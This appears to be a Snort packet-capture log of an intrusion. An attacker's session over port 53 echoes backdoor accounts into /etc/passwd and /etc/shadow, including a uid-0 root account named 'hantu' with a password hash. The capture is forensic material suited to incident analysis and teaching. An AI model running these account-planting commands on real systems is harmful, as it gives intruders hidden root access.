95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:44:00.432457 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26498  DF
*****PA* Seq: 0x45D2CB   Ack: 0x3FA0791C   Win: 0x7D78
TCP Options => NOP NOP TS: 4043120 144023623
65 63 68 6F 20 22 74 77 69 6E 3A 3A 35 30 36 3A  echo "twin::506:
35 30 36 3A 3A 2F 68 6F 6D 65 2F 74 77 69 6E 3A  506::/home/twin:
2F 62 69 6E 2F 62 61 73 68 22 20 3E 3E 20 2F 65  /bin/bash" >> /e
74 63 2F 70 61 73 73 77 64 0A                    tc/passwd.

04/26-06:44:00.448249 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18892  DF
******A* Seq: 0x3FA0791C   Ack: 0x45D305   Win: 0x7C70
TCP Options => NOP NOP TS: 144029033 4043120

04/26-06:44:00.562329 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26499  DF
*****PA* Seq: 0x45D305   Ack: 0x3FA0791C   Win: 0x7D78
TCP Options => NOP NOP TS: 4043134 144029033
65 63 68 6F 20 22 74 77 69 6E 3A 77 33 6E 54 32  echo "twin:w3nT2
48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A 22  H0b6AjM2:::::::"
20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 0A   >> /etc/shadow.
0A                                               .

04/26-06:44:00.578252 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18893  DF
******A* Seq: 0x3FA0791C   Ack: 0x45D336   Win: 0x7C70
TCP Options => NOP NOP TS: 144029046 4043134

04/26-06:44:03.647436 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26501  DF
*****PA* Seq: 0x45D336   Ack: 0x3FA0791C   Win: 0x7D78
TCP Options => NOP NOP TS: 4043443 144029046
0A                                               .

04/26-06:44:03.658554 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18894  DF
******A* Seq: 0x3FA0791C   Ack: 0x45D337   Win: 0x7C70
TCP Options => NOP NOP TS: 144029354 4043443

04/26-06:44:04.699420 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26502  DF
*****PA* Seq: 0x45D337   Ack: 0x3FA0791C   Win: 0x7D78
TCP Options => NOP NOP TS: 4043548 144029354
65 63 68 6F 20 22 68 61 6E 74 75 3A 3A 30 3A 30  echo "hantu::0:0
3A 3A 2F 3A 2F 62 69 6E 2F 62 61 73 68 22 20 3E  ::/:/bin/bash" >
3E 20 2F 65 74 63 2F 70 61 73 73 77 64 0A        > /etc/passwd.

04/26-06:44:04.718625 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18895  DF
******A* Seq: 0x3FA0791C   Ack: 0x45D365   Win: 0x7C70
TCP Options => NOP NOP TS: 144029460 4043548

04/26-06:44:04.829064 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26504  DF
*****PA* Seq: 0x45D365   Ack: 0x3FA0791C   Win: 0x7D78
TCP Options => NOP NOP TS: 4043561 144029460
65 63 68 6F 20 22 68 61 6E 74 75 3A 77 33 6E 54  echo "hantu:w3nT
32 48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A  2H0b6AjM2:::::::
22 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77  " >> /etc/shadow
0A 0A 0A

04/26-06:44:04.848620 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18896  DF
******A* Seq: 0x3FA0791C   Ack: 0x45D398   Win: 0x7C70
TCP Options => NOP NOP TS: 144029473 4043561

04/26-06:46:21.055744 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26540  DF
***F**A* Seq: 0x45D398   Ack: 0x3FA0791C   Win: 0x7D78
TCP Options => NOP NOP TS: 4057184 144029473

04/26-06:46:21.055951 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18974  DF
******A* Seq: 0x3FA0791C   Ack: 0x45D399   Win: 0x7C70
TCP Options => NOP NOP TS: 144043092 4057184

04/26-06:46:21.056696 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18975  DF
***F**A* Seq: 0x3FA0791C   Ack: 0x45D399   Win: 0x7C70
TCP Options => NOP NOP TS: 144043092 4057184

04/26-06:46:21.167231 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26542  DF
******A* Seq: 0x45D399   Ack: 0x3FA0791D   Win: 0x7D78
TCP Options => NOP NOP TS: 4057196 144043092
 

Exiting...
 

===============================================================================
Snort processed 59 packets.
Breakdown by protocol:
    TCP: 33         (55.932%)
    UDP: 26         (44.068%)
   ICMP: 0          (0.000%)
    ARP: 0          (0.000%)
   IPv6: 0          (0.000%)
    IPX: 0          (0.000%)
  OTHER: 0          (0.000%)
 

===============================================================================